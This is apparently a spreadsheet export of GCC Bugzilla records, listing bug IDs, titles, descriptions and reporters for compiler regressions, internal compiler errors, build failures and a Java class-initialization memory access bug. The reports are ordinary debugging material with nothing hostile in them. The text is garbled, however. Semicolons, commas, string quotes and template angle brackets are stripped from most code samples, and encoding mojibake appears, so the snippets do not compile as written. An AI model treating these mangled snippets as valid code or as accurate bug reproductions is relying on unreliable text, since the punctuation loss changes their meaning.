Executing on host: /opt/gcc/i686-darwin/gcc/xgcc -B/opt/gcc/i686-darwin/gcc/   -DSKIP_DECIMAL_FLOAT -fno-show-column -c  -o c_compat_main_tst.o /opt/gcc/gcc-4.4-work/gcc/testsuite/gcc.dg/compat/struct-by-value-17a_main.c    (timeout = 300)
/opt/gcc/gcc-4.4-work/gcc/testsuite/gcc.dg/compat/struct-by-value-17a_main.c:24: error: redefinition of 'main'
/opt/gcc/gcc-4.4-work/gcc/testsuite/gcc.dg/compat/struct-by-value-17a_main.c:11: error: previous definition of 'main' was here
...
Executing on host: /opt/gcc/i686-darwin/gcc/xgcc -B/opt/gcc/i686-darwin/gcc/   -DSKIP_DECIMAL_FLOAT -fno-show-column -c  -o c_compat_x_tst.o /opt/gcc/gcc-4.4-work/gcc/testsuite/gcc.dg/compat//struct-by-value-17a_x.c    (timeout = 300)
/opt/gcc/gcc-4.4-work/gcc/testsuite/gcc.dg/compat//struct-by-value-17a_x.c:44: error: conflicting types for 'Scd1'
/opt/gcc/gcc-4.4-work/gcc/testsuite/gcc.dg/compat//struct-by-value-17a_x.c:7: error: previous declaration of 'Scd1' was here
/opt/gcc/gcc-4.4-work/gcc/testsuite/gcc.dg/compat//struct-by-value-17a_x.c:44: error: conflicting types for 'Scd2'
/opt/gcc/gcc-4.4-work/gcc/testsuite/gcc.dg/compat//struct-by-value-17a_x.c:7: error: previous declaration of 'Scd2' was here
...
... a lot of similar errors
...
Executing on host: /opt/gcc/i686-darwin/gcc/xgcc -B/opt/gcc/i686-darwin/gcc/   -DSKIP_DECIMAL_FLOAT -fno-show-column -c  -o c_compat_y_tst.o /opt/gcc/gcc-4.4-work/gcc/testsuite/gcc.dg/compat//struct-by-value-17a_y.c    (timeout = 300)
/opt/gcc/gcc-4.4-work/gcc/testsuite/gcc.dg/compat//struct-by-value-17a_y.c:30: error: redefinition of 'test_va'
/opt/gcc/gcc-4.4-work/gcc/testsuite/gcc.dg/compat//struct-by-value-17a_y.c:8: error: previous definition of 'test_va' was here
/opt/gcc/gcc-4.4-work/gcc/testsuite/gcc.dg/compat//struct-by-value-17a_y.c:37: error: conflicting types for 'Scd1'^M
/opt/gcc/gcc-4.4-work/gcc/testsuite/gcc.dg/compat//struct-by-value-17a_y.c:15: error: previous declaration of 'Scd1' was here
/opt/gcc/gcc-4.4-work/gcc/testsuite/gcc.dg/compat//struct-by-value-17a_y.c:37: error: conflicting types for 'Scd2'
/opt/gcc/gcc-4.4-work/gcc/testsuite/gcc.dg/compat//struct-by-value-17a_y.c:15: error: previous declaration of 'Scd2' was here
...
... a lot of similar errors
...</t>
  </si>
  <si>
    <t>GCC-21630</t>
  </si>
  <si>
    <t>[4.1 Regression] gcc.dg/vect/vect-none.c scan-tree-dump-times vectorized 1 loops 1 fails</t>
  </si>
  <si>
    <t>The failure
FAIL: gcc.dg/vect/vect-none.c scan-tree-dump-times vectorized 1 loops 1
appeared on mainline on i686-pc-linux-gnu between 20050516 and 20050517.  It may
not be straightforward to tell which patch was responsible since the test ICEd
(bug 21448) with the former compiler and a pass or fail in conjunction with an
ICE may just be coincidental.  However the .sum file from 20050506 (before the
ICE was introduced) shows
PASS: gcc.dg/vect/vect-none.c scan-tree-dump-times vectorized 1 loops 1
so this test has regressed relative to then.</t>
  </si>
  <si>
    <t>GCC-5417</t>
  </si>
  <si>
    <t>Illegal memory access in _Jv_IsAssignableFrom</t>
  </si>
  <si>
    <t xml:space="preserve">
It is not just enough to patch _Jv_IsInstanceOf to add a check to force the initialization of the class.  The problem would occur any place that _Jv_IsAssignableFrom is called with an uninitialized class.  Another such example is a cast. The compiler generates a _Jv_CheckCast which also does not force an initialization of the class.
Release:
gcc version 3.1 20010911 (experimental)
Environment:
Linux msmith 2.4.7-10 #1 Thu Sep 6 17:27:27 EDT 2001 i686 unknown
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc/configure --host=i686-pc-linux-gnu --prefix=/home/msmith/GCC-3.1 --enable-shared --enable-threads=posix --enable-languages=cc++java --enable-version-specific-runtime-libs
How-To-Repeat:
The following demonstrates the illegal access using electric fence to generate a segv (which is turned into a NullPointerException) when _Jv_IsAssignableFrom accesses the uninitialized class.  In the second (1) and fourth (3) test cases the class goes into an infinite loop generating segvs (segv causes exception to be constructed which causes segv etc.).  I don't know why the casts should have such a different effect than the instanceof operator.  
// BEGIN FILE - Main.java
public class Main {
    public static void main(String[] args) throws Exception {
	int testNum = 0
	if(args != null &amp;&amp; args.length &gt; 0) {
	    testNum = Integer.parseInt(args[0])
	}
	switch(testNum) {
	case 0:
	    try {
		Test.testInstanceOf()
	    } catch (NullPointerException exception) {
		System.err.println(Illegal memory access for instanceof)
	    }
	    break
	case 1:
	    try {
		Test.testCast()
	    } catch (NullPointerException exception) {
		System.err.println(Illegal memory access for cast)
	    }
	    break
	case 2:
	    try {
		Test.testInstanceOf()
	    } catch (NullPointerException exception) {
		System.err.println
		    (Illegal memory access for instanceof (interface))
	    }
	    break
	case 3:
	    try {
		Test.testCast()
	    } catch (NullPointerException exception) {
		System.err.println
		    (Illegal memory access for interface cast)
	    }
	    break
	}
    }
}
class Test {
    public static void testInstanceOf() {
	Object t = new Test()
	if(t instanceof Foo1) {
	    System.err.println(.)
	}
    }
    public static void testCast() {
	Object t = new Test()
	try {
	    if(((Foo2)t).equals(.)) {
		System.err.println(.)
	    }
	} catch (ClassCastException exception) {
	    // expected
	}
    }
    public static void testInstanceOfI() {
	Object t = new Test()
	if(t instanceof Bar2) {
	    System.err.println(.)
	}
    }
    public static void testCastI() {
	Object t = new Test()
	try {
	    if(((Bar2)t).equals(.)) {
		System.err.println(.)
	    }
	} catch (ClassCastException exception) {
	    // expected
	}
    }
}
class Foo1 {}
class Foo2 {}
interface Bar1 {}
interface Bar2 {}
// END FILE - Main.java
bash$ /home/msmith/GCC-3.1/bin/gcj --main=Main -o Test \
   Main.java
bash$ ./Test 0
bash$ ./Test 1
bash$ ./Test 2
bash$ ./Test 3
bash$ export LD_PRELOAD=/home/msmith/lib/libefence.so.0.0
bash$ ./Test 0
  Electric Fence 2.2.0 Copyright (C) 1987-1999 Bruce Perens 
Illegal memory access for instanceof
bash$ ./Test 1
  Electric Fence 2.2.0 Copyright (C) 1987-1999 Bruce Perens 
^C
bash$ ./Test 2
  Electric Fence 2.2.0 Copyright (C) 1987-1999 Bruce Perens 
Illegal memory access for instanceof (interface)
bash$ ./Test 3
  Electric Fence 2.2.0 Copyright (C) 1987-1999 Bruce Perens 
^C</t>
  </si>
  <si>
    <t>msmith</t>
  </si>
  <si>
    <t>GCC-81285</t>
  </si>
  <si>
    <t>[8 Regression] r249888 breaks bootstrap on ppc64le</t>
  </si>
  <si>
    <t>r249888 breaks bootstrap on ppc64le e.g.:
../../../gcc/libgcc/libgcov-driver.c: In function â€˜gcov_do_dumpâ€™:
../../../gcc/libgcc/libgcov-driver.c:853:1: error: verify_flow_info: REG_BR_PROB is set but cfg probability is not
 }
 ^
during RTL pass: loop2_doloop
../../../gcc/libgcc/libgcov-driver.c:853:1: internal compiler error: verify_flow_info failed
0x1039eeb3 verify_flow_info()
        ../../gcc/gcc/cfghooks.c:259
0x107fc44b execute_function_todo
        ../../gcc/gcc/passes.c:2001
0x107fd183 do_per_function
        ../../gcc/gcc/passes.c:1655
0x107fd403 execute_todo</t>
  </si>
  <si>
    <t>GCC-9737</t>
  </si>
  <si>
    <t>[DR150] Partial template specialisation selection failure involving template parameter defaults</t>
  </si>
  <si>
    <t>G++ fails to perform correct partial template specialisation selection when the template parameter either depends on or is equal to a default type or value:
// a simple template:
  template  struct T {}
// two partial specializations:
  template  class A typename B&gt;
  struct T &gt; {}
  template  class A typename B typename C&gt;
  struct T &gt; {}
// the subject type that we will try to match (note the default):
  template  struct P
// now let's try to instantiate T with P:
  T &gt; a // ok
  T &gt; b // ambiguous instantiation
  T &gt; c // ambiguous instantiation
Comeau has no problems compiling any of this.
Release:
gcc version 3.2 (mingw special 20020817-1)
Environment:
Configured with: ../gcc/configure --with-gcc --with-gnu-ld --with-gnu-as --host=mingw32 --target=mingw32 --prefix=/mingw --enable-threads --disable-nls --enable-languages=f77c++objcada --disable-win32-registry --disable-shared
Thread model: win32
gcc version 3.2 (mingw special 20020817-1)
How-To-Repeat:
Try compiling the code from the description.</t>
  </si>
  <si>
    <t>gcc-bugzilla</t>
  </si>
  <si>
    <t>GCC-7947</t>
  </si>
  <si>
    <t>cpp0 -std=gnu99 rejects # comments</t>
  </si>
  <si>
    <t>The bug only appears with -std=gnu99.
The preprocessor rejects # comments on a line of their own
when compiling assembler code.
Release:
gcc (GCC) 3.2 (20020809) Debian prerelease
Environment:
i386-gnu
How-To-Repeat:
$ echo # foo | cpp -lang-asm -std=gnu99
# 1 
# 1 
# 1 
# 1 
:1:3: invalid preprocessing directive #foo</t>
  </si>
  <si>
    <t>GCC-11372</t>
  </si>
  <si>
    <t>[3.4 regression] verify_flow_info: Wrong frequency of block at -O3</t>
  </si>
  <si>
    <t>% /tmp/bla/bin/gcc -v -c -O3 -ffast-math eval.i 
Reading specs from /tmp/bla/bin/../lib/gcc-lib/alphaev68-unknown-linux-gnu/3.4/specs
Configured with: ../configure --disable-nls --enable-languages=c
Thread model: posix
gcc version 3.4 20030629 (experimental)
 /tmp/bla/bin/../lib/gcc-lib/alphaev68-unknown-linux-gnu/3.4/cc1 -fpreprocessed
eval.i -quiet -dumpbase eval.i -mcpu=ev67 -auxbase eval -O3 -version -ffast-math
-o /tmp/ccFi5VTS.s
GNU C version 3.4 20030629 (experimental) (alphaev68-unknown-linux-gnu)
        compiled by GNU C version 3.4 20030624 (experimental).
GGC heuristics: --param ggc-min-expand=64 --param ggc-min-heapsize=64115
eval.i: In function `evalPrimary':
eval.i:5959: error: verify_flow_info: Wrong frequency of block 72 -1
eval.i:5959: internal compiler error: verify_flow_info failed
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Does not happen at -O2 or without -ffast-math.</t>
  </si>
  <si>
    <t>GCC-34023</t>
  </si>
  <si>
    <t>Wrong using of user-defined conversion operator for converting rvalue to reference on constant.</t>
  </si>
  <si>
    <t>// gcc version 3.4.5 (mingw-special)
class a
{
public:
	template
	operator T &amp;() const
	{
		static int f
		return f // line # 10
	}
	/* 
	// unsafe workaround:
	operator a const &amp;() const
	{
		return *this
	}
	*/
}
int main()
{
	// : In member function `a::operator T&amp;() const [with T = const a]':
	// :27:   instantiated from here
	// :10: error: invalid initialization of reference of type 'const a&amp;' from expression of type 'int'
	a const  // line # 27
	/*
	// workaround:
	a const temp
	a const 
	*/
}</t>
  </si>
  <si>
    <t>sergey.gcc</t>
  </si>
  <si>
    <t>GCC-68697</t>
  </si>
  <si>
    <t>[6 regression] CHKP] Many vararg-*.c tests fail (bounds violation is not detected)</t>
  </si>
  <si>
    <t>All vararg tests in gcc.target/i386/mpx suite fail due to delayed VA_ARG builtin call lowering.  We don't handle return bounds for internal functions and therefore all pointers returned by VA_ARG get zero bounds.</t>
  </si>
  <si>
    <t>GCC-6861</t>
  </si>
  <si>
    <t>Conflicting type name allowed</t>
  </si>
  <si>
    <t>Two conflicting types are incorrectly allowed in the same declaration.  The sample code below ought to trigger an error but is incorrectly accepted.
typedef unsigned char T
T short a
Release:
3.1
Environment:
all
How-To-Repeat:
gcc -c bug.c</t>
  </si>
  <si>
    <t>stevec</t>
  </si>
  <si>
    <t>GCC-57518</t>
  </si>
  <si>
    <t>[4.8 Regression] Redundant insn generated in LRA</t>
  </si>
  <si>
    <t>Testcase:
char ip[10]
int total total1
void foo() {
  int t
  t = ip[2]
  total = t 
}
Target: x86_64-linux-gnu
gcc version 4.9.0 20130529 (experimental) (GCC) 
~/workarea/gcc-r199418/build/install/bin/gcc -O2 -S 1.c
        .cfi_startproc
        movzbl  ip+2(%rip) %eax
        movb    %al -16(%rsp)     ==&gt; redundent
        movl    -16(%rsp) %eax    ==&gt; redundent
        andl    $3 %eax
        movl    %eax total(%rip)
        ret
        .cfi_endproc
Target: x86_64-linux-gnu
gcc version 4.8.0 20120613 (experimental) (GCC)
gcc -O2 -S 1.c
	.cfi_startproc
	movzbl	ip+2(%rip) %eax
	andl	$3 %eax
	movl	%eax total(%rip)
	ret
	.cfi_endproc
IR before LRA:
(insn 12 7 8 2 (set (reg:QI 64 [ ip+2 ])
        (mem/j/c:QI (const:DI (plus:DI (symbol_ref:DI (ip)  )
                    (const_int 2 [0x2]))) [0 ip+2 S1 A8])) 1.c:9 87 {*movqi_internal}
     (expr_list:REG_EQUIV (mem/j/c:QI (const:DI (plus:DI (symbol_ref:DI (ip)  )
                    (const_int 2 [0x2]))) [0 ip+2 S1 A8])
        (nil)))
(insn 8 12 9 2 (parallel [
            (set (reg:SI 65 [ D.1731 ])
                (and:SI (subreg:SI (reg:QI 64 [ ip+2 ]) 0)
                    (const_int 3 [0x3])))
            (clobber (reg:CC 17 flags))
        ]) 1.c:9 387 {*andsi_1}
     (expr_list:REG_DEAD (reg:QI 64 [ ip+2 ])
        (expr_list:REG_UNUSED (reg:CC 17 flags)
            (expr_list:REG_EQUIV (mem/c:SI (symbol_ref:DI (total)  ) [2 total+0 S4 A32])
                (nil)))))
IR after LRA:
(insn 12 7 14 2 (set (reg:QI 0 ax [orig:64 ip+2 ] [64])
        (mem/j/c:QI (const:DI (plus:DI (symbol_ref:DI (ip)  )
                    (const_int 2 [0x2]))) [0 ip+2 S1 A8])) 1.c:9 87 {*movqi_internal}
     (expr_list:REG_EQUIV (mem/j/c:QI (const:DI (plus:DI (symbol_ref:DI (ip)  )
                    (const_int 2 [0x2]))) [0 ip+2 S1 A8])
        (nil)))
(insn 14 12 15 2 (set (mem/c:QI (plus:DI (reg/f:DI 7 sp)
                (const_int -16 [0xfffffffffffffff0])) [3 %sfp+-16 S1 A64])
        (reg:QI 0 ax [orig:64 ip+2 ] [64])) 1.c:9 87 {*movqi_internal}
     (expr_list:REG_DEAD (reg:QI 0 ax [orig:64 ip+2 ] [64])
        (nil)))
(insn 15 14 8 2 (set (reg:SI 0 ax [orig:65 D.1731 ] [65])
        (mem/c:SI (plus:DI (reg/f:DI 7 sp)
                (const_int -16 [0xfffffffffffffff0])) [3 %sfp+-16 S4 A64])) 1.c:9 85 {*movsi_internal}
     (nil))
(insn 8 15 16 2 (parallel [
            (set (reg:SI 0 ax [orig:65 D.1731 ] [65])
                (and:SI (reg:SI 0 ax [orig:65 D.1731 ] [65])
                    (const_int 3 [0x3])))
            (clobber (reg:CC 17 flags))
        ]) 1.c:9 387 {*andsi_1}
     (expr_list:REG_EQUIV (mem/c:SI (symbol_ref:DI (total)  ) [2 total+0 S4 A32])
        (nil)))
IRA Trace:
Pass 0 for finding pseudo/allocno costs
    a0 (r65l0) best GENERAL_REGS allocno GENERAL_REGS
    a1 (r64l0) best NO_REGS allocno NO_REGS
a1's rclass are all NO_REGS because it has REG_EQUIV note (equivalent to mem ip+2)
Because reg 64 is marked as equivalent to mem ip+2 insn 12 is expected to be deleted and reg 64 in insn 8 replaced by mem ip+2. In LRA constraints insn 12 is not deleted because the subreg op in insn 8 (see lra-constraints.c:3662 r199418). In addition reg 64's rclass is NO_REGS so redundent spills are inserted. 
The mode size check (lra-constraints.c:3662 r199418) needs to be considered in update_equiv_regs in IRA in order not to mark the reg 64 equivalent with mem ip + 2 in this case.</t>
  </si>
  <si>
    <t>wmi</t>
  </si>
  <si>
    <t>GCC-78532</t>
  </si>
  <si>
    <t>[7 Regression] libsanitizer fails to build on sparc64-linux-gnu</t>
  </si>
  <si>
    <t>seen with trunk r242874 on sparc64-linux-gnu
libtool: compile:  /&gt;/build/./gcc/xgcc -shared-libgcc -B/&gt;/build/./gcc -nostdinc++ -L/&gt;/build/sparc64-linux-gnu/libstdc++-v3/src -L/&gt;/build/sparc64-linux-gnu/libstdc++-v3/src/.libs -L/&gt;/build/sparc64-linux-gnu/libstdc++-v3/libsupc++/.libs -B/usr/lib/gcc-snapshot/sparc64-linux-gnu/bin/ -B/usr/lib/gcc-snapshot/sparc64-linux-gnu/lib/ -isystem /usr/lib/gcc-snapshot/sparc64-linux-gnu/include -isystem /usr/lib/gcc-snapshot/sparc64-linux-gnu/sys-include -D_GNU_SOURCE -D_DEBUG -D__STDC_CONSTANT_MACROS -D__STDC_FORMAT_MACROS -D__STDC_LIMIT_MACROS -DHAVE_RPC_XDR_H=1 -DHAVE_TIRPC_RPC_XDR_H=0 -I. -I../../../../src/libsanitizer/sanitizer_common -I.. -I ../../../../src/libsanitizer/include -isystem ../../../../src/libsanitizer/include/system -Wall -W -Wno-unused-parameter -Wwrite-strings -pedantic -Wno-long-long -fPIC -fno-builtin -fno-exceptions -fno-rtti -fomit-frame-pointer -funwind-tables -fvisibility=hidden -Wno-variadic-macros -I../../libstdc++-v3/include -I../../libstdc++-v3/include/sparc64-linux-gnu -I../../../../src/libsanitizer/../libstdc++-v3/libsupc++ -std=gnu++11 -DSANITIZER_LIBBACKTRACE -DSANITIZER_CP_DEMANGLE -I ../../../../src/libsanitizer/../libbacktrace -I ../libbacktrace -I ../../../../src/libsanitizer/../include -include ../../../../src/libsanitizer/libbacktrace/backtrace-rename.h -g -O2 -D_GNU_SOURCE -MT sanitizer_platform_limits_linux.lo -MD -MP -MF .deps/sanitizer_platform_limits_linux.Tpo -c ../../../../src/libsanitizer/sanitizer_common/sanitizer_platform_limits_linux.cc -o sanitizer_platform_limits_linux.o &gt;/dev/null 2&gt;&amp;1
In file included from ../../../../src/libsanitizer/sanitizer_common/sanitizer_platform_limits_posix.cc:196:0:
../../../../src/libsanitizer/sanitizer_common/sanitizer_internal_defs.h:261:72: error: size of array 'assertion_failed__1069' is negative
     typedef char IMPL_PASTE(assertion_failed_##_ line)[2*(int)(pred)-1]
                                                                        ^
../../../../src/libsanitizer/sanitizer_common/sanitizer_internal_defs.h:255:30: note: in expansion of macro 'IMPL_COMPILER_ASSERT'
 #define COMPILER_CHECK(pred) IMPL_COMPILER_ASSERT(pred __LINE__)
                              ^~~~~~~~~~~~~~~~~~~~
../../../../src/libsanitizer/sanitizer_common/sanitizer_platform_limits_posix.h:1455:3: note: in expansion of macro 'COMPILER_CHECK'
   COMPILER_CHECK(sizeof(((struct __sanitizer_##CLASS *) NULL)-&gt;MEMBER) == \
   ^~~~~~~~~~~~~~
../../../../src/libsanitizer/sanitizer_common/sanitizer_platform_limits_posix.cc:1069:1: note: in expansion of macro 'CHECK_STRUCT_SIZE_AND_OFFSET'
 CHECK_STRUCT_SIZE_AND_OFFSET(sigaction sa_flags)
 ^~~~~~~~~~~~~~~~~~~~~~~~~~~~
../../../../src/libsanitizer/sanitizer_common/sanitizer_internal_defs.h:261:72: error: size of array 'assertion_failed__1069' is negative
     typedef char IMPL_PASTE(assertion_failed_##_ line)[2*(int)(pred)-1]
                                                                        ^
../../../../src/libsanitizer/sanitizer_common/sanitizer_internal_defs.h:255:30: note: in expansion of macro 'IMPL_COMPILER_ASSERT'
 #define COMPILER_CHECK(pred) IMPL_COMPILER_ASSERT(pred __LINE__)
                              ^~~~~~~~~~~~~~~~~~~~
../../../../src/libsanitizer/sanitizer_common/sanitizer_platform_limits_posix.h:1457:3: note: in expansion of macro 'COMPILER_CHECK'
   COMPILER_CHECK(offsetof(struct __sanitizer_##CLASS MEMBER) ==          \
   ^~~~~~~~~~~~~~
../../../../src/libsanitizer/sanitizer_common/sanitizer_platform_limits_posix.cc:1069:1: note: in expansion of macro 'CHECK_STRUCT_SIZE_AND_OFFSET'
 CHECK_STRUCT_SIZE_AND_OFFSET(sigaction sa_flags)
 ^~~~~~~~~~~~~~~~~~~~~~~~~~~~
Makefile:522: recipe for target 'sanitizer_platform_limits_posix.lo' failed
make[6]: *** [sanitizer_platform_limits_posix.lo] Error 1</t>
  </si>
  <si>
    <t>GCC-81639</t>
  </si>
  <si>
    <t>ICE in rtl_verify_bb_insns at cfgrtl.c:2669 with a naked function</t>
  </si>
  <si>
    <t>Following test-case ICEs starting from r250736:
$ cat /tmp/ice.i
__attribute__ ((naked)) a () { b () }
$ ./xgcc -B. /tmp/ice.i -Os
/tmp/ice.i:1:25: warning: return type defaults to â€˜intâ€™ [-Wimplicit-int]
 __attribute__ ((naked)) a () { b () }
                         ^
/tmp/ice.i: In function â€˜aâ€™:
/tmp/ice.i:1:32: warning: implicit declaration of function â€˜bâ€™ [-Wimplicit-function-declaration]
 __attribute__ ((naked)) a () { b () }
                                ^
/tmp/ice.i:1:1: error: in basic block 2:
 __attribute__ ((naked)) a () { b () }
 ^~~~~~~~~~~~~
/tmp/ice.i:1:1: error: flow control insn inside a basic block
(insn 16 17 6 2 (trap_if (const_int 1 [0x1])
        (const_int 6 [0x6])) /tmp/ice.i:1 -1
     (nil))
during RTL pass: pro_and_epilogue
/tmp/ice.i:1:1: internal compiler error: in rtl_verify_bb_insns at cfgrtl.c:2669
0x5a1de4 _fatal_insn(char const* rtx_def const* char const* int char const*)
	../../gcc/rtl-error.c:108
0x760305 rtl_verify_bb_insns
	../../gcc/cfgrtl.c:2669
0x760305 rtl_verify_flow_info_1
	../../gcc/cfgrtl.c:2755
0x760322 rtl_verify_flow_info
	../../gcc/cfgrtl.c:2997
0x747bde verify_flow_info()
	../../gcc/cfghooks.c:257
0xab31c9 execute_function_todo
	../../gcc/passes.c:2002
0xab4222 execute_todo
	../../gcc/passes.c:2044</t>
  </si>
  <si>
    <t>GCC-25962</t>
  </si>
  <si>
    <t>Pointer (null) check after the use in cgraph.c</t>
  </si>
  <si>
    <t>In file gcc/cgraphunit.c function verify_cgraph_node(struct cgraph_node *node) the input argument 'node' has been dereferenced before doing any checking till on line 717 with following codition
...
717 if (!node)
718    {
719      error (node not found in DECL_ASSEMBLER_NAME hash)
720      error_found = true
721    }
...
Shouldn't this code be moved at the begining of this function? before de-referencing it?
Also on line 789-793 if there is any error we call dump_cgraph_node() which dumps the cgraph node. Shouldn't we do a check for non-null 'node' either here before calling or in function dump_cgraph_node() itself? This has been reported as a possible error by 'coverity prevent tool'.
Any thoughts?</t>
  </si>
  <si>
    <t>GCC-7627</t>
  </si>
  <si>
    <t>[avr] unrecognizable insn</t>
  </si>
  <si>
    <t>avr-gcc -c -Os --save-temps ppp.c -DAVR -o ppp.o -I.. -I../../avr-libc/include -mmcu=atmega103
ppp.c: In function `PPPEntry':
ppp.c:594: error: unrecognizable insn:
(insn 90 89 91 21 (nil) (set (reg:QI 56)
        (const_int 180 [0xb4])) -1 (nil)
    (expr_list:REG_EQUAL (const_int 180 [0xb4])
        (nil)))
ppp.c:594: internal compiler error: Internal compiler error in extract_insn at recog.c:2175
Note: optimizing for size.
This file comes from motorola's application note on ppp (AN2120).
configure options (gcc):
--prefix=/usr/local/avr-cvs --target=avr --program-prefix=avr- --disable-nls --enable-languages=c
configure options (binutils): 
--prefix=/usr/local/avr-cvs  --program-prefix=avr- --target=avr
Release:
3.3 20020818 (experimental) (and earlier)
Environment:
avr-gcc (GCC) 3.3 20020818 (experimental)
GNU assembler 2.13.90 20020818
--or--
avr-gcc (GCC) 3.1
GNU assembler 2.12.1
i686 host
How-To-Repeat:
ppp.i is supplied. ppp.c and the relevant includes are available upon request. ppp.c:594 is the end of the PPPEntry function.
Thanks for working on avr-gcc!</t>
  </si>
  <si>
    <t>rggammon</t>
  </si>
  <si>
    <t>GCC-67624</t>
  </si>
  <si>
    <t>arm/fp16.c __gnu_f2h_internal has wrong pattern for INF/NAN</t>
  </si>
  <si>
    <t>I believe the f2h conversion routine uses wrong mask for INF/NAN in the early shortcut. It seems to be the case also in the gcc HEAD.
This should fix it:
--- arm/fp16.c  2015-09-18 15:53:51.069011932 +0300
+++ fp16.c      2015-09-18 15:50:50.653013393 +0300
@@ -357 +357 @@
     {
       if (!ieee)
        return sign
-      return sign | 0x7e00 | (mantissa &gt;&gt; 13)
+      return sign | 0x7c00 | (mantissa &gt;&gt; 13)
     }
   if (aexp == 0 &amp;&amp; mantissa == 0)</t>
  </si>
  <si>
    <t>pekka.jaaskelainen</t>
  </si>
  <si>
    <t>GCC-19624</t>
  </si>
  <si>
    <t>PRE pessimizes ivopts</t>
  </si>
  <si>
    <t>The attached testcase is pessimized by PRE.  Be sure to get tree-level complete
loop unrolling enabled f.i. with -O2 -funroll-loops with current mainline.
With PRE a lot less computations are hoisted out of the inner loop.  Note this
is not a regression to 3.4 which is not able to decompose Loc appropriately
or avoid instantiating temporary objects of this type.</t>
  </si>
  <si>
    <t>GCC-8279</t>
  </si>
  <si>
    <t>REGRESSION: failure to find a matching function in ostream_iterator expansion</t>
  </si>
  <si>
    <t>The attached program compiles and runs correctly under
gcc 2.95.2 but fails to compile under gcc 3.2 (including
the release branch as of 17 Oct).  The compiler complains
that it cannot find a compatible operator&lt;&lt; while expanding
the ostream_iterator template even though an exact match
is present.  Defining HIDE_BUG reveals that the compiler is
perfectly capable of finding the operator&lt;&lt; and using it
when a loop rather than std::copy to the ostream_iterator
is used.
The error output is included in the map_test.ERRORS attachment.
Release:
gcc-3.2
Environment:
both linux (red hat 7.2) and solaris (sparc 2.7)
How-To-Repeat:
Do
gcc -c map_test.cpp
for comparison try
gcc -c -DHIDE_BUG map_test.cpp</t>
  </si>
  <si>
    <t>GCC-21942</t>
  </si>
  <si>
    <t>boehm-gc</t>
  </si>
  <si>
    <t>boehm-gc doesn't compile on Solaris 10/amd64</t>
  </si>
  <si>
    <t xml:space="preserve">
The amd64 multilib of boehm-gc doesn't build on i386-pc-solaris2.10: the
compilation fails with
/vol/gnu/src/gcc/gcc-dist/boehm-gc/include/private/gcconfig.h:435: error: parse error before '--' token
Environment:
System: SunOS cumaru 5.10 Generic_Patch i86pc i386 i86pc
Architecture: i86pc
host: i386-pc-solaris2.10
build: i386-pc-solaris2.10
target: i386-pc-solaris2.10
configured with: /vol/gnu/src/gcc/gcc-dist/configure --prefix=/vol/gcc --with-local-prefix=/vol/gcc --disable-nls --with-gnu-as --with-as=/usr/sfw/bin/gas --with-gmp-dir=/vol/gnu/obj/gmp-4.1.3 --with-mpfr-dir=/vol/gnu/obj/gmp-4.1.3 --enable-languages=cc++f95javaobjcada --disable-libmudflap
How-To-Repeat:
Bootstrap mainline as described above.</t>
  </si>
  <si>
    <t>GCC-63905</t>
  </si>
  <si>
    <t>redundant fields left in gcc/cp/cp-tree.h:lang_decl_fn</t>
  </si>
  <si>
    <t>svn commit 201994 (git commit fc3dabd5) changed DECL_CONSTRUCTOR_P/DECL_DESTRUCTOR_P to use middle-end flags instead of frontend flags however it didn't remove the now obsolete (unused) c++ frontend flags constructor_attr and destructor_attr from lang_decl_fn. fixing this would also free up 2 bits where there's only one left now.</t>
  </si>
  <si>
    <t>pageexec</t>
  </si>
  <si>
    <t>GCC-11453</t>
  </si>
  <si>
    <t>gcc &gt; 3.3 ICE</t>
  </si>
  <si>
    <t>Hi all
Here is the description of the ICE I encounter with last gcc 3.3.1 (but also
with 3.3 but not with gcc-3.0):
+ gcc -v -save-temps -D__KERNEL__
-I/usr/src/kernel-source-2.4.21-pa02-lvm-107-20030707/include -Wall
-Wstrict-prototypes -Wno-trigraphs -O2 -fno-strict-aliasing -fno-common
-fomit-frame-pointer -D__linux__ -pipe -fno-strength-reduce -mno-space-regs
-mfast-indirect-calls -mdisable-fpregs -ffunction-sections -march=1.1
-mschedule=7100 -D_JFS_4K -nostdinc -I /usr/lib/gcc-lib/hppa-linux/3.3.1/include
-DKBUILD_BASENAME=jfs_xtree -c -o jfs_xtree.o jfs_xtree.c
gcc: warning: -pipe ignored because -save-temps specified
Reading specs from /usr/lib/gcc-lib/hppa-linux/3.3.1/specs
Configured with: ../src/configure -v
--enable-languages=cc++f77pascalobjcadatreelang --prefix=/usr
--mandir=/usr/share/man --infodir=/usr/share/info
--with-gxx-include-dir=/usr/include/c++/3.3 --enable-shared --with-system-zlib
--enable-nls --without-included-gettext --enable-__cxa_atexit
--enable-sjlj-exceptions --enable-clocale=gnu --enable-debug --enable-objc-gc
hppa-linux
Thread model: posix
gcc version 3.3.1 20030626 (Debian prerelease)
 /usr/lib/gcc-lib/hppa-linux/3.3.1/cc1 -E -quiet -nostdinc -v
-I/usr/src/kernel-source-2.4.21-pa02-lvm-107-20030707/include -I
/usr/lib/gcc-lib/hppa-linux/3.3.1/include -D__GNUC__=3 -D__GNUC_MINOR__=3
-D__GNUC_PATCHLEVEL__=1 -D__KERNEL__ -D__linux__ -D_JFS_4K
-DKBUILD_BASENAME=jfs_xtree jfs_xtree.c -mno-space-regs -mfast-indirect-calls
-mdisable-fpregs -march=1.1 -mschedule=7100 -Wall -Wstrict-prototypes
-Wno-trigraphs -fno-strict-aliasing -fno-common -fomit-frame-pointer
-fno-strength-reduce -ffunction-sections -O2 jfs_xtree.i
#include ... search starts here:
#include  search starts here:
 /usr/src/kernel-source-2.4.21-pa02-lvm-107-20030707/include
 /usr/lib/gcc-lib/hppa-linux/3.3.1/include
End of search list.
 /usr/lib/gcc-lib/hppa-linux/3.3.1/cc1 -fpreprocessed jfs_xtree.i -quiet
-dumpbase jfs_xtree.c -mno-space-regs -mfast-indirect-calls -mdisable-fpregs
-march=1.1 -mschedule=7100 -auxbase-strip jfs_xtree.o -O2 -Wall
-Wstrict-prototypes -Wno-trigraphs -version -fno-strict-aliasing -fno-common
-fomit-frame-pointer -fno-strength-reduce -ffunction-sections -o jfs_xtree.s
GNU C version 3.3.1 20030626 (Debian prerelease) (hppa-linux)
	compiled by GNU C version 3.3.1 20030626 (Debian prerelease).
GGC heuristics: --param ggc-min-expand=38 --param ggc-min-heapsize=15788
jfs_xtree.c: In function `xtUpdate':
jfs_xtree.c:2351: error: insn does not satisfy its constraints:
